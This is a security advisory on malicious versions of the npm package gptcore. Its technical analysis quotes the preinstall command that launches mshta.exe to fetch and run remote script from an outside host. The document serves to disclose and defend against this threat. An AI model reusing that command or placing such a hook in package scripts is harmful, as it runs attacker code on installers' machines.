MAL-2026-10204: Malicious code in gptcore (npm)

0
High
Published: 07/12/2026 (07/12/2026, 20:45:48 UTC)
Source: GCVE Database
Product: gptcore

Description

The gptcore npm package versions 4.0.6, 4.0.7, and 4.0.8 include a malicious preinstall script that executes a Windows command to launch mshta.exe and fetch code from an untrusted remote HTTP URL. This causes arbitrary HTA/JScript content from the remote host to run on the installer's machine during npm install. The remote content is unrelated to the package's documented purpose and is fetched without integrity verification or publisher trust.

Technical Analysis

The gptcore package (versions 4.0.6, 4.0.7, and 4.0.8) contains a preinstall lifecycle script that runs the command `cmd /c "mshta http://fixars.top"` on Windows systems during installation. This command launches mshta.exe to retrieve and execute HTA/JScript content from a hardcoded third-party HTTP URL. The remote content is not verified or related to the package's legitimate functionality, resulting in arbitrary code execution on the user's machine during npm install.

Potential Impact

Users installing affected versions of gptcore on Windows may have arbitrary code executed on their systems without consent, due to the automatic execution of a malicious preinstall script that fetches and runs remote code. This can lead to compromise of the installer's environment, data theft, or further malware installation.

Mitigation Recommendations

No official patch or remediation is currently documented. Users should avoid installing gptcore versions 4.0.6, 4.0.7, and 4.0.8. Verify package integrity and source before installation. Monitor for vendor advisories for potential fixes or updates. Since this is a malicious package behavior, removing or blocking the package from installation is recommended until a safe version is available.
